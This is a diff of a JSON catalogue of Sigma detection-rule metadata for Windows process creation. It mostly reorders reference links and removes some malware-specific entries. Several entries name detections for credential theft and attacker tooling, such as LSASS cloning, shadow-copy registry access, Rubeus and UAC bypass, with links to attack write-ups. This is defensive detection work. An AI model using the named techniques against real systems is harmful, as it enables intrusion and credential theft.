- ],
- "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_rorschach_ransomware_activity.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.003",
- "attack.t1059.001",
- "attack.defense_evasion"
- ]
- },
- "related": [
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "0e9e6c63-1350-48c4-9fa1-7ccb235edc68",
- "value": "Rorschach Ransomware Execution Activity"
- },
{
"description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n",
"meta": {
@@ -41483,8 +41177,8 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/countuponsec/status/910977826853068800",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/",
"https://twitter.com/countuponsec/status/910969424215232518",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml"
],
"tags": [
@@ -41550,8 +41244,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608",
"https://h.43z.one/ipconverter/",
+ "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml"
],
"tags": [
@@ -41654,8 +41348,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
+ "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml"
],
"tags": [
@@ -41777,9 +41471,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s",
"https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/",
"https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/",
+ "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_parent_anomaly.yml"
],
"tags": [
@@ -41848,8 +41542,8 @@
"logsource.product": "windows",
"refs": [
"https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/",
- "https://twitter.com/Hexacorn/status/1420053502554951689",
"https://twitter.com/SBousseaden/status/1464566846594691073?s=20",
+ "https://twitter.com/Hexacorn/status/1420053502554951689",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml"
],
"tags": [
@@ -41890,9 +41584,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s",
"https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/",
"https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/",
+ "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_susp_flags.yml"
],
"tags": [
@@ -41960,13 +41654,13 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://ngrok.com/docs",
"https://twitter.com/xorJosh/status/1598646907802451969",
- "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/",
- "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp",
- "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection",
- "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
"https://www.softwaretestinghelp.com/how-to-use-ngrok/",
+ "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection",
+ "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp",
+ "https://ngrok.com/docs",
+ "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
+ "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ngrok.yml"
],
"tags": [
@@ -41999,8 +41693,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/",
"https://lolbas-project.github.io/lolbas/Binaries/Gpscript/",
+ "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml"
],
"tags": [
@@ -42033,8 +41727,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/1ZRR4H/status/1534259727059787783",
"https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/",
+ "https://twitter.com/1ZRR4H/status/1534259727059787783",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml"
],
"tags": [
@@ -42067,13 +41761,13 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
"https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
- "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters",
"https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)",
- "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html",
+ "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters",
"https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/",
+ "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html",
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)",
+ "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml"
],
"tags": [
@@ -42114,9 +41808,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/hFireF0X/status/897640081053364225",
"https://github.com/hfiref0x/UACME",
"https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
- "https://twitter.com/hFireF0X/status/897640081053364225",
"https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml"
],
@@ -42229,108 +41923,6 @@
"uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b",
"value": "Arbitrary Command Execution Using WSL"
},
- {
- "description": "Detects WannaCry ransomware activity",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro",
- "creation_date": "2019/01/16",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_wannacry.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1210",
- "attack.discovery",
- "attack.t1083",
- "attack.defense_evasion",
- "attack.t1222.001",
- "attack.impact",
- "attack.t1486",
- "attack.t1490"
- ]
- },
- "related": [
- {
- "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "34e793de-0274-4982-9c1a-246ed1c19dee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079",
- "value": "WannaCry Ransomware Activity"
- },
- {
- "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par",
- "meta": {
- "author": "Olaf Hartong",
- "creation_date": "2019/05/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_other_bearlpe.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/djhohnstein/polarbearrepo/blob/f26d3e008093cc5c835e92a7165170baf6713d43/bearlpe/polarbear/polarbear/exploit.cpp",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_other_bearlpe.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1053.005",
- "car.2013-08-001"
- ]
- },
- "related": [
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "931b6802-d6a6-4267-9ffa-526f57f22aaf",
- "value": "Potential BearLPE Exploitation"
- },
{
"description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products",
"meta": {
@@ -42344,9 +41936,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://thedfirreport.com/2023/03/06/2022-year-in-review/",
"https://www.yeahhub.com/list-installed-programs-version-path-windows/",
"https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product",
- "https://thedfirreport.com/2023/03/06/2022-year-in-review/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml"
],
"tags": [
@@ -42380,8 +41972,8 @@
"logsource.product": "windows",
"refs": [
"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65",
- "https://redcanary.com/blog/yellow-cockatoo/",
"https://zero2auto.com/2020/05/19/netwalker-re/",
+ "https://redcanary.com/blog/yellow-cockatoo/",
"https://mez0.cc/posts/cobaltstrike-powershell-exec/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_xor_commandline.yml"
],
@@ -42540,8 +42132,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
"https://www.joeware.net/freetools/tools/adfind/",
+ "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml"
],
@@ -42688,8 +42280,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/hexacorn/status/1448037865435320323",
"https://twitter.com/Gal_B1t/status/1062971006078345217",
+ "https://twitter.com/hexacorn/status/1448037865435320323",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml"
],
"tags": [
@@ -42709,40 +42301,6 @@
"uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b",
"value": "Potential Command Line Path Traversal Evasion Attempt"
},
- {
- "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL",
- "meta": {
- "author": "FPT.EagleEye",
- "creation_date": "2020/12/25",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://cyber.wtf/2021/11/15/guess-whos-back/",
- "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet_rundll32_execution.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9",
- "value": "Potential Emotet Rundll32 Execution"
- },
{
"description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM",
"meta": {
@@ -42811,16 +42369,16 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "http://managed670.rssing.com/chan-5590147/all_p1.html",
- "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
- "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
"https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
+ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
+ "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "http://managed670.rssing.com/chan-5590147/all_p1.html",
+ "https://twitter.com/_xpn_/status/1268712093928378368",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
"https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
"https://bunnyinside.com/?term=f71e8cb9c76a",
"https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
- "https://twitter.com/_xpn_/status/1268712093928378368",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml"
],
"tags": [
@@ -42923,9 +42481,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.poweradmin.com/paexec/",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
+ "https://www.poweradmin.com/paexec/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml"
],
"tags": [
@@ -43023,39 +42581,6 @@
"uuid": "48bbc537-b652-4b4e-bd1d-281172df448f",
"value": "Sysinternals PsSuspend Execution"
},
- {
- "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location",
- "meta": {
- "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)",
- "creation_date": "2020/06/03",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_binary_masquerading.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b",
- "value": "Lazarus System Binary Masquerading"
- },
{
"description": "Download and compress a remote file and store it in a cab file on local machine.",
"meta": {
@@ -43103,8 +42628,8 @@
"logsource.product": "windows",
"refs": [
"https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://twitter.com/jonasLyk/status/1555914501802921984",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
+ "https://twitter.com/jonasLyk/status/1555914501802921984",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml"
],
"tags": [
@@ -43137,9 +42662,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/",
"https://twitter.com/nas_bench/status/1534915321856917506",
"https://twitter.com/nas_bench/status/1534916659676422152",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml"
],
"tags": [
@@ -43391,8 +42916,8 @@
"logsource.product": "windows",
"refs": [
"https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings",
- "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://twitter.com/0gtweet/status/1628720819537936386",
+ "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml"
],
"tags": [
@@ -43583,8 +43108,8 @@
"logsource.product": "windows",
"refs": [
"https://twitter.com/bryon_/status/975835709587075072",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/",
"https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml"
],
"tags": [
@@ -43757,10 +43282,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
"https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
- "https://twitter.com/splinter_code/status/1483815103279603714",
"https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3",
+ "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
+ "https://twitter.com/splinter_code/status/1483815103279603714",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml"
],
"tags": "No established tags"
@@ -43848,9 +43373,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html",
"https://github.com/GhostPack/Rubeus",
"https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/",
- "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml"
],
"tags": [
@@ -43900,10 +43425,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://redcanary.com/blog/raspberry-robin/",
"https://twitter.com/Hexacorn/status/1187143326673330176",
- "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
+ "https://redcanary.com/blog/raspberry-robin/",
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca",
+ "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_susp_exec.yml"
],
"tags": [
@@ -43990,10 +43515,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/Z3Jpa29z/status/1317545798981324801",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/",
+ "https://twitter.com/Z3Jpa29z/status/1317545798981324801",
"https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csi_execution.yml"
],
"tags": [
@@ -44098,39 +43623,6 @@
"uuid": "f89b08d0-77ad-4728-817b-9b16c5a69c7a",
"value": "HackTool - SharpImpersonation Execution"
},
- {
- "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/07/30",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_taidoor.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1055.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "d1aa3382-abab-446f-96ea-4de52908210b",
- "value": "TAIDOOR RAT DLL Load"
- },
{
"description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"",
"meta": {
@@ -44334,9 +43826,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/",
- "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js",
"https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/",
+ "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js",
+ "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_koadic.yml"
],
"tags": [
@@ -44569,8 +44061,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_execution.yml"
],
"tags": [
@@ -44647,10 +44139,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
"https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
- "https://twitter.com/splinter_code/status/1483815103279603714",
"https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3",
+ "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/",
+ "https://twitter.com/splinter_code/status/1483815103279603714",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml"
],
"tags": "No established tags"
@@ -44671,8 +44163,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/dsnezhkov/TruffleSnout",
"https://github.com/dsnezhkov/TruffleSnout/blob/master/TruffleSnout/Docs/USAGE.md",
+ "https://github.com/dsnezhkov/TruffleSnout",
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml"
],
@@ -44706,9 +44198,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
- "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
"https://twitter.com/vxunderground/status/1423336151860002816?s=20",
+ "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
+ "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml"
],
"tags": [
@@ -44728,41 +44220,6 @@
"uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d",
"value": "Sensitive Registry Access via Volume Shadow Copy"
},
- {
- "description": "Detects LockerGoga ransomware activity via specific command line.",
- "meta": {
- "author": "Vasiliy Burov, oscd.community",
- "creation_date": "2020/10/18",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_lockergoga_ransomware.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a",
- "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/",
- "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_lockergoga_ransomware.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1486"
- ]
- },
- "related": [
- {
- "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "74db3488-fd28-480a-95aa-b7af626de068",
- "value": "LockerGoga Ransomware Activity"
- },
{
"description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs",
"meta": {
@@ -44777,10 +44234,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/EricaZelic/status/1614075109827874817",
- "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/",
"https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList",
